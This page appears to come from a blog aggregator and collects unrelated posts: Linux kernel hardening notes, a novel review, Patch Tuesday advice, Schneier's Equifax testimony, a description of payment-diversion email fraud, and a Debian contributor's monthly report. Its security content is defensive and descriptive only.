Related to the addr_limit field mentioned above, another class of bug is finding a way to force the kernel into accidentally leaving addr_limit open to kernel memory through an unbalanced call to set_fs(). In some areas of the kernel, in order to reuse userspace routines (usually VFS or compat related), code will do something like: set_fs(KERNEL_DS); ...some code here...; set_fs(USER_DS);. When the USER_DS call goes missing (usually due to a buggy error path or exception), subsequent system calls can suddenly start writing into kernel memory via copy_to_user (where the “to user” really means “within the addr_limit range”).

Thomas Garnier implemented USER_DS checking at syscall exit time for x86, arm, and arm64. This means that a broken set_fs() setting will not extend beyond the buggy syscall that fails to set it back to USER_DS. Additionally, as part of the discussion on the best way to deal with this feature, Christoph Hellwig and Al Viro (and others) have been making extensive changes to avoid the need for set_fs() being used at all, which should greatly reduce the number of places where it might be possible to introduce such a bug in the future.

SLUB freelist hardening
A common class of heap attacks is overwriting the freelist pointers stored inline in the unallocated SLUB cache objects. PaX/grsecurity developed an inexpensive defense that XORs the freelist pointer with a global random value (and the storage address). Daniel Micay improved on this by using a per-cache random value, and I refactored the code a bit more. The resulting feature, enabled with CONFIG_SLAB_FREELIST_HARDENED, makes freelist pointer overwrites very hard to exploit unless an attacker has found a way to expose both the random value and the pointer location. This should render blind heap overflow bugs much more difficult to exploit.

Additionally, Alexander Popov implemented a simple double-free defense, similar to the “fasttop” check in the GNU C library, which will catch sequential free()s of the same pointer. (And has already uncovered a bug.)

Future work would be to provide similar metadata protections to the SLAB allocator (though SLAB doesn’t store its freelist within the individual unused objects, so it has a different set of exposures compared to SLUB).

setuid-exec stack limitation
Continuing the various additional defenses to protect against future problems related to userspace memory layout manipulation (as shown most recently in the Stack Clash attacks), I implemented an 8MiB stack limit for privileged (i.e. setuid) execs, inspired by a similar protection in grsecurity, after reworking the secureexec handling by LSMs. This complements the unconditional limit to the size of exec arguments that landed in v4.13.

randstruct automatic struct selection
While the bulk of the port of the randstruct gcc plugin from grsecurity landed in v4.13, the last of the work needed to enable automatic struct selection landed in v4.14. This means that the coverage of randomized structures, via CONFIG_GCC_PLUGIN_RANDSTRUCT, now includes one of the major targets of exploits: function pointer structures. Without knowing the build-randomized location of a callback pointer an attacker needs to overwrite in a structure, exploits become much less reliable.

structleak passed-by-reference variable initialization
Ard Biesheuvel enhanced the structleak gcc plugin to initialize all variables on the stack that are passed by reference when built with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL. Normally the compiler will yell if a variable is used before being initialized, but it silences this warning if the variable’s address is passed into a function call first, as it has no way to tell if the function did actually initialize the contents. So the plugin now zero-initializes such variables (if they hadn’t already been initialized) before the function call that takes their address. Enabling this feature has a small performance impact, but solves many stack content exposure flaws. (In fact at least one such flaw reported during the v4.15 development cycle was mitigated by this plugin.)

improved boot entropy
Laura Abbott and Daniel Micay improved early boot entropy available to the stack protector by both moving the stack protector setup later in the boot, and including the kernel command line in boot entropy collection (since with some devices it changes on each boot).

eBPF JIT for 32-bit ARM
The ARM BPF JIT had been around a while, but it didn’t support eBPF (and, as a result, did not provide constant value blinding, which meant it was exposed to being used by an attacker to build arbitrary machine code with BPF constant values). Shubham Bansal spent a bunch of time building a full eBPF JIT for 32-bit ARM which both speeds up eBPF and brings it up to date on JIT exploit defenses in the kernel.

seccomp improvements
Tyler Hicks addressed a long-standing deficiency in how seccomp could log action results. In addition to creating a way to mark a specific seccomp filter as needing to be logged with SECCOMP_FILTER_FLAG_LOG, he added a new action result, SECCOMP_RET_LOG. With these changes in place, it should be much easier for developers to inspect the results of seccomp filters, and for process launchers to generate logs for their child processes operating under a seccomp filter.

Additionally, I finally found a way to implement an often-requested feature for seccomp, which was to kill an entire process instead of just the offending thread. This was done by creating the SECCOMP_RET_ACTION_FULL mask (née SECCOMP_RET_ACTION) and implementing SECCOMP_RET_KILL_PROCESS.

That’s it for now; please let me know if I missed anything. The v4.15 merge window is now open!

© 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

Planet DebianRuss Allbery: Review: The Piper's Son

Review: The Piper's Son, by Melina Marchetta

Series: Francesca #2
Publisher: Candlewick Press
Copyright: 2010
Printing: 2011
ISBN: 0-7636-5458-2
Format: Kindle
Pages: 330

Tom Mackee's family has fallen apart. The impetus was the death of his uncle Joe in the London tube terrorist bombings, but that was only the start. He destroyed his chances with the only woman he really loved. His father's drinking got out of control, his mother left with his younger sister to live in a different city, and he refused to go with them and abandon his father. But then, six months later, his father abandoned him anyway. As this novel opens, Tom collapses while performing a music set, high on drugs and no sleep, and wakes up to discover his roommates have been fired from their jobs for stealing, and in turn have thrown him out of their apartment. He's at rock bottom.

The one place he can turn for a place to stay is his aunt Georgie, the second (although less frequent) viewpoint character of this book. She was the one who took the trip to the UK to try to find out what happened and retrieve her brother's body, and the one who had to return to Australia with nothing. Her life isn't in much better shape than Tom's. She's kept her job, but she's pregnant by her ex-boyfriend but barely talking to him, since he now has a son by another woman he met during their separation. And she's not even remotely over her grief.

The whole Finch/Mackee family is, in short, a disaster. But they have a few family relationships left that haven't broken, some underlying basic decency, and some patient and determined friends.

I should warn up-front, despite having read this book without knowing this, that this is a sequel to Saving Francesca, set five years later and focusing on secondary characters from the original novel. I've subsequently read that book as well, though, and I don't think reading it first is necessary. This is one of the rare books where being a sequel made it a better stand-alone novel. I never felt a gap of missing story, just a rich and deep background of friendships and previous relationships that felt realistic. People are embedded in networks of relationships even when they feel the most alone, and I really enjoyed seeing that surface in this book. All those patterns from Tom's past didn't feel like information I was missing. They felt like glimpses of what you'd see if you looked into any other person's life.

The plot summary above might make The Piper's Son sound like a depressing drama fest, but Marchetta made an excellent writing decision: the worst of this has already happened before the start of the book, and the rest is in the first chapter. This is not at all a book about horrible things happening to people. It's a book about healing. An authentic, prickly, angry healing that doesn't forget and doesn't turn into simple happily-ever-after stories, but does involve a lot of recognition that one has been an ass, and that it's possible to be less of an ass in the future, and maybe some things can be fixed.

A plot summary might fool you into thinking that this is a book about a boy and his father, or about dealing with a drunk you still love. It's not. The bright current under this whole story is not father-son bonding. It's female friendships. Marchetta pulls off a beautiful double-story, writing a book that's about Tom, and Georgie, and the layered guilt and tragedy of the Finch/Mackee family, but whose emotional heart is their friends. Francesca, Justine, absent Siobhan. Georgie's friend Lucia. Ned, the cook, and his interactions with Tom's friends. And Tara Finke, also mostly absent, but perfectly written into the story in letters and phone calls.

Marchetta never calls unnecessary attention to this, keeping the camera on Tom and Georgie, but the process of reading this book is a dawning realization of just how much work friendship is doing under the surface, how much back-channel conversation is happening off the page, and how much careful and thoughtful and determined work went into providing Tom a floor, a place to get his feet under him, and enough of a shove for him to pull himself together. Pulling that off requires a deft and subtle authorial touch, and I'm in awe at how well it worked.

This is a beautifully written novel. Marchetta never belabors an emotional point, sticking with a clear and spare description of actions and thoughts, with just the right sentences scattered here and there to expose the character's emotions. Tom's family is awful at communication, which is much of the reason why they start the book in the situation they're in, but Marchetta somehow manages to write that in a way that didn't just frustrate me or make me want to start banging their heads together. She somehow conveys the extent to which they're trying, even when they're failing, and adds just the right descriptions so that the reader can follow the wordless messages they send each other even when they can't manage to talk directly. I usually find it very hard to connect with people who can only communicate by doing things rather than saying them. It's a high compliment to the author that I felt I understood Tom and his family as well as I did.

One bit of warning: while this is not a story of a grand reunion with an alcoholic father where all is forgiven because family, thank heavens, there is an occasional wiggle in that direction. There is also a steady background assumption that one should always try to repair family relationships, and a few tangential notes about the Finches and Mackees that made me think there was a bit more abuse here than anyone involved wants to admit. I don't think the book is trying to make apologies for this, and instead is trying to walk the fine line of talking about realistically messed up families, but I also don't have a strong personal reaction to that type of story. If you have an aversion to "we should all get along because faaaaamily" stories, you may want to skip this book, or at least go in pre-warned.

That aside, the biggest challenge I had in reading this book was not breaking into tears. The emotional arc is just about perfect. Tom and Georgie never stay stuck in the same emotional cycle for too long, Marchetta does a wonderful job showing irritating characters from a slightly different angle and having them become much less irritating, and the interactions between Tom, Tara, and Francesca are just perfect. I don't remember reading another book that so beautifully captures that sensation of knowing that you've been a total ass, knowing that you need to stop, but realizing just how much work you're going to have to do, and how hard that work will be, once you own up to how much you fucked up. That point where you keep being an ass for a few moments longer, because stopping is going to hurt so much, but end up stopping anyway because you can't stand yourself any more. And stopping and making amends is hard and hurts badly, and yet somehow isn't quite as bad as you thought it was going to be.

This is really great stuff.

One final complaint, though: what is it with mainstream fiction and the total lack of denouement? I don't read very much mainstream fiction, but this is the second really good mainstream book I've read (after The Death of Bees) that hits its climax and then unceremoniously dumps the reader on the ground and disappears. Come back here! I wasn't done with these people! I don't need a long happily-ever-after story, but give me at least a handful of pages to be happy with the characters after crying with them for hours! ARGH.

But, that aside, the reader does get that climax, and it's note-perfect to the rest of the book. Everyone is still themselves, no one gets suddenly transformed, and yet everything is... better. It's the kind of book you can trust.

Highly, highly recommended.

Rating: 9 out of 10

Planet Linux AustraliaJames Morris: Save the Dates: Linux Security Summit Events for 2018

There will be a new European version of the Linux Security Summit for 2018, in addition to the established North American event.

The dates and locations are as follows:

Stay tuned for CFP announcements!

 

,

Krebs on SecurityAdobe, Microsoft Patch Critical Cracks

It’s Nov. 14 — the second Tuesday of the month (a.k.a. “Patch Tuesday) — and Adobe and Microsoft have issued gobs of security updates for their software. Microsoft’s 11 patch bundles fix more than four-dozen security holes in various Windows versions and Office products — including at least four serious flaws that were publicly disclosed prior to today. Meanwhile, Adobe’s got security updates available for a slew of titles, including Flash Player, Photoshop, Reader and Shockwave.

Four of the vulnerabilities Microsoft fixed today have public exploits, but they do not appear to be used in any active malware campaigns, according to Gill Langston at security vendor Qualys. Perhaps the two most serious flaws likely to impact Windows end users involve vulnerabilities in Microsoft browsers Internet Explorer and Edge.

Qualys’ Langston reminds us that on last Patch Tuesday, Microsoft quietly released the fix for CVE-2017-13080, widely known as the KRACK vulnerability in WPA2 wireless protocol, but did not make it known until a week later, when the vulnerability was publicly disclosed. Check out the Qualys blog and this post from Ivanti for more on this month’s patches from Redmond. Otherwise, visit Windows Update sometime soon (click the Start/Windows button, then type Windows Update).

Adobe issued patches to fix at least 62 security vulnerabilities in its products, including several critical bugs in Adobe Flash Player and Reader/Acrobat.  The Flash Player update brings the browser plugin to v. 27.0.0.187 on Windows, Mac, Linux and Chrome OS.

Windows users who browse the Web with anything other than Internet Explorer may need to apply the Flash patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

Chrome and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version.

When in doubt, click the vertical three dot icon to the right of the URL bar, select “Help,” then “About Chrome”: If there is an update available, Chrome should install it then. Chrome will replace that three dot icon with an up-arrow inside of a circle when updates are waiting to be installed.

Standard disclaimer: Because Flash remains such a security risk, I continue to encourage readers to remove or hobble Flash Player unless and until it is needed for a specific site or purpose. More on that approach (as well as slightly less radical solutions ) can be found in A Month Without Adobe Flash Player. The short version is that you can probably get by without Flash installed and not miss it at all.

For readers still unwilling to cut the cord, there are half-measures that work almost as well. Fortunately, disabling Flash in Chrome is simple enough. Paste “chrome://settings/content” into a Chrome browser bar and then select “Flash” from the list of items. By default it should be set to “Ask first” before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.

Another, perhaps less elegant, solution is to keep Flash installed in a browser that you don’t normally use, and then to only use that browser on sites that require it.

Planet DebianJonathan Dowland: WadC 2.2

Bird Cage, a WadC-generated map for Heretic
Bird Cage map

I have recently released version 2.2 of Wad Compiler, a lazy functional programming language and IDE for the construction of Doom maps.

The biggest change in this version is a reworking of the preferences system (to use the Java Preferences API), the wadcli command-line interface respecting preferences and a new preferences UI dialog (adapted from Quake Injector).

There are two new example maps: A Labyrinth demonstration contributed by "Yoruk", and a Heretic map Bird Cage by yours truly. These are both now amongst the largest examples in the collection, although laby.wl was generated by a higher-level program.

For more information see the release notes and the reference, or check out the new gallery of examples or skip straight to downloads.

I have no plans to work on WadC further (but never say never, I suppose.)

CryptogramLong Article on NSA and the Shadow Brokers

The New York Times just published a long article on the Shadow Brokers and their effects on NSA operations. Summary: it's been an operational disaster, the NSA still doesn't know who did it or how, and NSA morale has suffered considerably.

This is me on the Shadow Brokers from last May.

Worse Than FailureCodeSOD: One's Company

The more you learn about something, the less confident you often become in making statements about it, because you understand the complexities of the matter. If, for example, I asked you to help me refine my definition of how dates and times work, you know that many assumptions are wrong. Or if we tried to define what makes a string a person’s name, we’ll run into similar problems. This is even true for a value we’ve all probably seen implemented as a boolean value: gender. The more you learn about these subjects, the more complex and nuanced your understanding of them becomes. More and more, your answers start with, “It’s complicated…”.

Eugene was going through some code at a customer’s site, and he found that their business logic depended heavily on a flag ISCOMAPNY (sic), but there was no ISCOMPANY field anywhere in the database. There was, however, a SEX field on the customer records, implemented as an integer.

Digging through the queries, Eugene found a new approach to defining a company:

SELECT …, CASE ISNULL(c.SEX, '')
    WHEN '6'
THEN '-1'
    WHEN '9'
THEN '-1'
    ELSE '0'
END AS ISCOMAPNY, …
FROM customers
WHERE …

Like I said, it's complicated.

[Advertisement] Easily create complex server configurations and orchestrations using both the intuitive, drag-and-drop editor and the text/script editor.  Find out more and download today!

CryptogramMe on the Equifax Breach

Testimony and Statement for the Record of Bruce Schneier
Fellow and Lecturer, Belfer Center for Science and International Affairs, Harvard Kennedy School
Fellow, Berkman Center for Internet and Society at Harvard Law School

Hearing on "Securing Consumers' Credit Data in the Age of Digital Commerce"

Before the

Subcommittee on Digital Commerce and Consumer Protection
Committee on Energy and Commerce
United States House of Representatives

1 November 2017
2125 Rayburn House Office Building
Washington, DC 20515

Mister Chairman and Members of the Committee, thank you for the opportunity to testify today concerning the security of credit data. My name is Bruce Schneier, and I am a security technologist. For over 30 years I have studied the technologies of security and privacy. I have authored 13 books on these subjects, including Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World (Norton, 2015). My popular newsletter Crypto-Gram and my blog Schneier on Security are read by over 250,000 people.

Additionally, I am a Fellow and Lecturer at the Harvard Kennedy School of Government --where I teach Internet security policy -- and a Fellow at the Berkman-Klein Center for Internet and Society at Harvard Law School. I am a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an advisory board member of Electronic Privacy Information Center and VerifiedVoting.org. I am also a special advisor to IBM Security and the Chief Technology Officer of IBM Resilient.

I am here representing none of those organizations, and speak only for myself based on my own expertise and experience.

I have eleven main points:

1. The Equifax breach was a serious security breach that puts millions of Americans at risk.

Equifax reported that 145.5 million US customers, about 44% of the population, were impacted by the breach. (That's the original 143 million plus the additional 2.5 million disclosed a month later.) The attackers got access to full names, Social Security numbers, birth dates, addresses, and driver's license numbers.

This is exactly the sort of information criminals can use to impersonate victims to banks, credit card companies, insurance companies, cell phone companies and other businesses vulnerable to fraud. As a result, all 143 million US victims are at greater risk of identity theft, and will remain at risk for years to come. And those who suffer identify theft will have problems for months, if not years, as they work to clean up their name and credit rating.

2. Equifax was solely at fault.

This was not a sophisticated attack. The security breach was a result of a vulnerability in the software for their websites: a program called Apache Struts. The particular vulnerability was fixed by Apache in a security patch that was made available on March 6, 2017. This was not a minor vulnerability; the computer press at the time called it "critical." Within days, it was being used by attackers to break into web servers. Equifax was notified by Apache, US CERT, and the Department of Homeland Security about the vulnerability, and was provided instructions to make the fix.

Two months later, Equifax had still failed to patch its systems. It eventually got around to it on July 29. The attackers used the vulnerability to access the company's databases and steal consumer information on May 13, over two months after Equifax should have patched the vulnerability.

The company's incident response after the breach was similarly damaging. It waited nearly six weeks before informing victims that their personal information had been stolen and they were at increased risk of identity theft. Equifax opened a website to help aid customers, but the poor security around that -- the site was at a domain separate from the Equifax domain -- invited fraudulent imitators and even more damage to victims. At one point, the official Equifax communications even directed people to that fraudulent site.

This is not the first time Equifax failed to take computer security seriously. It confessed to another data leak in January 2017. In May 2016, one of its websites was hacked, resulting in 430,000 people having their personal information stolen. Also in 2016, a security researcher found and reported a basic security vulnerability in its main website. And in 2014, the company reported yet another security breach of consumer information. There are more.

3. There are thousands of data brokers with similarly intimate information, similarly at risk.

Equifax is more than a credit reporting agency. It's a data broker. It collects information about all of us, analyzes it all, and then sells those insights. It might be one of the biggest, but there are 2,500 to 4,000 other data brokers that are collecting, storing, and selling information about us -- almost all of them companies you've never heard of and have no business relationship with.

The breadth and depth of information that data brokers have is astonishing. Data brokers collect and store billions of data elements covering nearly every US consumer. Just one of the data brokers studied holds information on more than 1.4 billion consumer transactions and 700 billion data elements, and another adds more than 3 billion new data points to its database each month.

These brokers collect demographic information: names, addresses, telephone numbers, e-mail addresses, gender, age, marital status, presence and ages of children in household, education level, profession, income level, political affiliation, cars driven, and information about homes and other property. They collect lists of things we've purchased, when we've purchased them, and how we paid for them. They keep track of deaths, divorces, and diseases in our families. They collect everything about what we do on the Internet.

4. These data brokers deliberately hide their actions, and make it difficult for consumers to learn about or control their data.

If there were a dozen people who stood behind us and took notes of everything we purchased, read, searched for, or said, we would be alarmed at the privacy invasion. But because these companies operate in secret, inside our browsers and financial transactions, we don't see them and we don't know they're there.

Regarding Equifax, few consumers have any idea what the company knows about them, who they sell personal data to or why. If anyone knows about them at all, it's about their business as a credit bureau, not their business as a data broker. Their website lists 57 different offerings for business: products for industries like automotive, education, health care, insurance, and restaurants.

In general, options to "opt-out" don't work with data brokers. It's a confusing process, and doesn't result in your data being deleted. Data brokers will still collect data about consumers who opt out. It will still be in those companies' databases, and will still be vulnerable. It just don't be included individually when they sell data to their customers.

5. The existing regulatory structure is inadequate.

Right now, there is no way for consumers to protect themselves. Their data has been harvested and analyzed by these companies without their knowledge or consent. They cannot improve the security of their personal data, and have no control over how vulnerable it is. They only learn about data breaches when the companies announce them -- which can be months after the breaches occur -- and at that point the onus is on them to obtain credit monitoring services or credit freezes. And even those only protect consumers from some of the harms, and only those suffered after Equifax admitted to the breach.

Right now, the press is reporting "dozens" of lawsuits against Equifax from shareholders, consumers, and banks. Massachusetts has sued Equifax for violating state consumer protection and privacy laws. Other states may follow suit.

If any of these plaintiffs win in the court, it will be a rare victory for victims of privacy breaches against the companies that have our personal information. Current law is too narrowly focused on people who have suffered financial losses directly traceable to a specific breach. Proving this is difficult. If you are the victim of identity theft in the next month, is it because of Equifax or does the blame belong to another of the thousands of companies who have your personal data? As long as one can't prove it one way or the other, data brokers remain blameless and liability free.

Additionally, much of this market in our personal data falls outside the protections of the Fair Credit Reporting Act. And in order for the Federal Trade Commission to levy a fine against Equifax, it needs to have a consent order and then a subsequent violation. Any fines will be limited to credit information, which is a small portion of the enormous amount of information these companies know about us. In reality, this is not an effective enforcement regime.

Although the FTC is investigating Equifax, it is unclear if it has a viable case.

6. The market cannot fix this because we are not the customers of data brokers.

The customers of these companies are people and organizations who want to buy information: banks looking to lend you money, landlords deciding whether to rent you an apartment, employers deciding whether to hire you, companies trying to figure out whether you'd be a profitable customer -- everyone who wants to sell you something, even governments.

Markets work because buyers choose from a choice of sellers, and sellers compete for buyers. None of us are Equifax's customers. None of us are the customers of any of these data brokers. We can't refuse to do business with the companies. We can't remove our data from their databases. With few limited exceptions, we can't even see what data these companies have about us or correct any mistakes.

We are the product that these companies sell to their customers: those who want to use our personal information to understand us, categorize us, make decisions about us, and persuade us.

Worse, the financial markets reward bad security. Given the choice between increasing their cybersecurity budget by 5%, or saving that money and taking the chance, a rational CEO chooses to save the money. Wall Street rewards those whose balance sheets look good, not those who are secure. And if senior management gets unlucky and the a public breach happens, they end up okay. Equifax's CEO didn't get his $5.2 million severance pay, but he did keep his $18.4 million pension. Any company that spends more on security than absolutely necessary is immediately penalized by shareholders when its profits decrease.

Even the negative PR that Equifax is currently suffering will fade. Unless we expect data brokers to put public interest ahead of profits, the security of this industry will never improve without government regulation.

7. We need effective regulation of data brokers.

In 2014, the Federal Trade Commission recommended that Congress require data brokers be more transparent and give consumers more control over their personal information. That report contains good suggestions on how to regulate this industry.

First, Congress should help plaintiffs in data breach cases by authorizing and funding empirical research on the harm individuals receive from these breaches.

Specifically, Congress should move forward legislative proposals that establish a nationwide "credit freeze" -- which is better described as changing the default for disclosure from opt-out to opt-in -- and free lifetime credit monitoring services. By this I do not mean giving customers free credit-freeze options, a proposal by Senators Warren and Schatz, but that the default should be a credit freeze.

The credit card industry routinely notifies consumers when there are suspicious charges. It is obvious that credit reporting agencies should have a similar obligation to notify consumers when there is suspicious activity concerning their credit report.

On the technology side, more could be done to limit the amount of personal data companies are allowed to collect. Increasingly, privacy safeguards impose "data minimization" requirements to ensure that only the data that is actually needed is collected. On the other hand, Congress should not create a new national identifier to replace the Social Security Numbers. That would make the system of identification even more brittle. Better is to reduce dependence on systems of identification and to create contextual identification where necessary.

Finally, Congress needs to give the Federal Trade Commission the authority to set minimum security standards for data brokers and to give consumers more control over their personal information. This is essential as long as consumers are these companies' products and not their customers.

8. Resist complaints from the industry that this is "too hard."

The credit bureaus and data brokers, and their lobbyists and trade-association representatives, will claim that many of these measures are too hard. They're not telling you the truth.

Take one example: credit freezes. This is an effective security measure that protects consumers, but the process of getting one and of temporarily unfreezing credit is made deliberately onerous by the credit bureaus. Why isn't there a smartphone app that alerts me when someone wants to access my credit rating, and lets me freeze and unfreeze my credit at the touch of the screen? Too hard? Today, you can have an app on your phone that does something similar if you try to log into a computer network, or if someone tries to use your credit card at a physical location different from where you are.

Moreover, any credit bureau or data broker operating in Europe is already obligated to follow the more rigorous EU privacy laws. The EU General Data Protection Regulation will come into force, requiring even more security and privacy controls for companies collecting storing the personal data of EU citizens. Those companies have already demonstrated that they can comply with those more stringent regulations.

Credit bureaus, and data brokers in general, are deliberately not implementing these 21st-century security solutions, because they want their services to be as easy and useful as possible for their actual customers: those who are buying your information. Similarly, companies that use this personal information to open accounts are not implementing more stringent security because they want their services to be as easy-to-use and convenient as possible.

9. This has foreign trade implications.

The Canadian Broadcast Corporation reported that 100,000 Canadians had their data stolen in the Equifax breach. The British Broadcasting Corporation originally reported that 400,000 UK consumers were affected; Equifax has since revised that to 15.2 million.

Many American Internet companies have significant numbers of European users and customers, and rely on negotiated safe harbor agreements to legally collect and store personal data of EU citizens.

The European Union is in the middle of a massive regulatory shift in its privacy laws, and those agreements are coming under renewed scrutiny. Breaches such as Equifax give these European regulators a powerful argument that US privacy regulations are inadequate to protect their citizens' data, and that they should require that data to remain in Europe. This could significantly harm American Internet companies.

10. This has national security implications.

Although it is still unknown who compromised the Equifax database, it could easily have been a foreign adversary that routinely attacks the servers of US companies and US federal agencies with the goal of exploiting security vulnerabilities and obtaining personal data.

When the Fair Credit Reporting Act was passed in 1970, the concern was that the credit bureaus might misuse our data. That is still a concern, but the world has changed since then. Credit bureaus and data brokers have far more intimate data about all of us. And it is valuable not only to companies wanting to advertise to us, but foreign governments as well. In 2015, the Chinese breached the database of the Office of Personal Management and stole the detailed security clearance information of 21 million Americans. North Korea routinely engages in cybercrime as way to fund its other activities. In a world where foreign governments use cyber capabilities to attack US assets, requiring data brokers to limit collection of personal data, securely store the data they collect, and delete data about consumers when it is no longer needed is a matter of national security.

11. We need to do something about it.

Yes, this breach is a huge black eye and a temporary stock dip for Equifax -- this month. Soon, another company will have suffered a massive data breach and few will remember Equifax's problem. Does anyone remember last year when Yahoo admitted that it exposed personal information of a billion users in 2013 and another half billion in 2014?

Unless Congress acts to protect consumer information in the digital age, these breaches will continue.

Thank you for the opportunity to testify today. I will be pleased to answer your questions.

,

Planet DebianSteve Kemp: Paternity-leave is half-over

I'm taking the month of November off work, so that I can exclusively take care of our child. Despite it being a difficult time, with him teething, it has been a great half-month so far.

During the course of the month I've found my interest in a lot of technological things waning, so I've killed my account(s) on a few platforms, and scaled back others - if I could exclusively do child-care for the next 20 years I'd be very happy, but sadly I don't think that is terribly realistic.

My interest in things hasn't entirely vanished though, to the extent that I found the time to replace my use of etcd with consul yesterday, and I'm trying to work out how to simplify my hosting setup. Right now I have a bunch of servers doing two kinds of web-hosting:

Hosting static-sites is trivial, whether with a virtual machine, via Amazons' S3-service, or some other static-host such as netlify.

Hosting for "dynamic stuff" is harder. These days a trend for "serverless" deployments allows you to react to events and be dynamic, but not everything can be a short-lived piece of ruby/javascript/lambda. It feels like I could setup a generic platform for launching containers, or otherwise modernising FastCGI, etc, but I'm not sure what the point would be. (I'd still be the person maintaining it, and it'd still be a hassle. I've zero interest in selling things to people, as that only means more support.)

In short I have a bunch of servers, they mostly tick over unattended, but I'm not really sure I want to keep them running for the next 10+ years. Over time our child will deserve, demand, and require more attention which means time for personal stuff is only going to diminish.

Simplify things now wouldn't be a bad thing to do, before it is too late.

CryptogramCybercriminals Infiltrating E-Mail Networks to Divert Large Customer Payments

There's a new criminal tactic involving hacking an e-mail account of a company that handles high-value transactions and diverting payments. Here it is in real estate:

The scam generally works like this: Hackers find an opening into a title company's or realty agent's email account, track upcoming home purchases scheduled for settlements -- the pricier the better -- then assume the identity of the title agency person handling the transaction.

Days or sometimes weeks before the settlement, the scammer poses as the title or escrow agent whose email accounts they've hijacked and instructs the home buyer to wire the funds needed to close -- often hundreds of thousands of dollars, sometimes far more -- to the criminals' own bank accounts, not the title or escrow company's legitimate accounts. The criminals then withdraw the money and vanish.

Here it is in fine art:

The fraud is relatively simple. Criminals hack into an art dealer's email account and monitor incoming and outgoing correspondence. When the gallery sends a PDF invoice to a client via email following a sale, the conversation is hijacked. Posing as the gallery, hackers send a duplicate, fraudulent invoice from the same gallery email address, with an accompanying message instructing the client to disregard the first invoice and instead wire payment to the account listed in the fraudulent document.

Once money has been transferred to the criminals' account, the hackers move the money to avoid detection and then disappear. The same technique is used to intercept payments made by galleries to their artists and others. Because the hackers gain access to the gallery's email contacts, the scam can spread quickly, with fraudulent emails appearing to come from known sources.

I'm sure it's happening in other industries as well, probably even with business-to-business commerce.

EDITED TO ADD (11/14): Brian Krebs wrote about this in 2014.

Planet DebianMarkus Koschany: My Free Software Activities in October 2017

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in  Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • I packaged a new upstream version of springlobby. There is even a more recent one now but I discovered that it would fail to build from source. I reported the issue and now I am waiting for another release.
  • These packages were also updated: bullet, tuxfootball (#876481), berusky (#877979), spring, hitori and trackballs.
  • I released a new version of cube2-data, a DFSG-free version of the Sauerbraten game. This release was largely made possible thanks to the work of Nyav.
  • I prepared two stable point releases of berusky and simutrans to fix #877979 and # 869029 for users of Debian’s stable distributions too. The bug in Berusky is already resolved but I’m still waiting for the confirmation to upload simutrans (#878668).
  • I updated wing and biniax2. Here I discovered that biniax2 would segfault immediately at startup after recompilation. I tracked down the issue to some C code that caused undefined behavior, prepared a patch and released a fixed revision.
  • I sponsored a new upstream version of mupen64plus-qt.

Debian Java

  • This month I started to work on fixing Java9 bugs since Java 9 shall become the new default JDK/JRE for Buster. The bug reports were filed by Chris West who did the important work of identifying build failures and broken packages. I started with some low hanging fruits first and the following packages are now Java 9 ready: libgetopt-java, libjide-oss-java, activemq-protobuf, antelope, yecht, slashtime, colorpicker, f2j, libreadline-java, libjaxp1.3-java, jlapack, isorelax, libisrt-java, rxtx, uima-addons.
  • New upstream releases this month: apktool, jboss-xnio, okio, pdfsam, libsejda-java, bcel, autocomplete, mediathekview, sweethome3d.
  • MediathekView introduced yet another build-dependency. Let’s welcome libokhttp-java in Debian.
  • I upgraded jackson-databind to fix CVE-2017-7525. While I was at it, I continued this work with jackson-core, jackson-annotations, jackson-dataformat-xml, jackson-jr, jackson-datatype-joda, jackson-module-jaxb-annotations, jackson-dataformat-cbor, jackson-dataformat-smile, jackson-dataformat-yaml and jackson-jaxrs-providers. I also requested the removal of jackson-datatype-guava.
  • More resolved RC issues: commons-io (#873118), tycho (#879250)
  • Package updates: mockobjects (converted from CDBS to DH) and jblas (RC #877225, #873212, #698176)
  • The Maven 2 to Maven 3 transition caused (and still causes) a lot of fallout: I investigated the following packages with RC bugs. In most cases the issue was in another package, so the bugs could be closed but there were also packages like conversant-disruptor (#869002) which caused build failures unrelated to the transition. In total 15 packages were triaged or fixed: jasypt (#871195), mustache-java (#869009), libslf4j-java, apache-log4j2, conversant-disruptor, powermock(#869017), jetty9(#869021), maven-site-plugin(#869001),  javamail(#871102), assertj-core(#871131), java-allocation-instrumenter(#869251), json-smart(#868603), sisu-guice(#868611), maven-archiver(#871069), doxia-sitetools(#875948)
  • I have started to work on a new upstream version of triplea, multiple strategy games written in Java. The update would fix a couple of bugs and make the package ready for Java 9.
  • It was also requested to upgrade Gradle to version 3.4.1 at least. I have made good progress but there is more work to do.

Debian LTS

This was my twentieth month as a paid contributor and I have been paid to work 19 hours on Debian LTS, a project started by Raphaël Hertzog. I will catch up with the remaining 1,75 hours in November. In that time I did the following:

  • From 30. October to 05. November I was in charge of our LTS frontdesk. I triaged bugs in jasperreports, jbossas4, libstruts1.2-java, httpcomponents-client, vim, emacs23, trafficserver, async-http-client, liblouis, wordpress, apr, apr-utils, redis, nautilus, libpam4j and spip.
  • I decided to mark jbossas4 as end-of-life because the Java application server was never fully packaged and the version in Wheezy is already nine years old. I investigated the open security issues in jasperreports and contacted upstream but they have not published any details yet.
  • I pinged bug #878088. The reportbug maintainer still has to respond to the idea of informing the security teams when users report bugs in security uploads. I will discuss the possibility with the rest of the team, whether it is helpful to patch reportbug in Wheezy/Jessie/Stretch now.
  • DLA-1151-1 and DLA-1160-1. Issued two security updates for WordPress  addressing 10 CVE. It was later discovered that the patch for CVE-2017-14990 was incomplete and caused a regression when using WordPress’ multi-site feature. Single-site installations were not affected. The complete fix would either include a  database upgrade or a different approach without using the new database field “signup_id”. I reverted the patch for now and issued a regression update in DLA-1151-2.
  • DLA-1158-1. Issued a security update for bchunk fixing 3 CVE.
  • DLA-1159-1. Issued a security update for graphicsmagick fixing 2 CVE.
  • DLA-1164-1. Issued a security update for mupdf fixing 2 CVE.
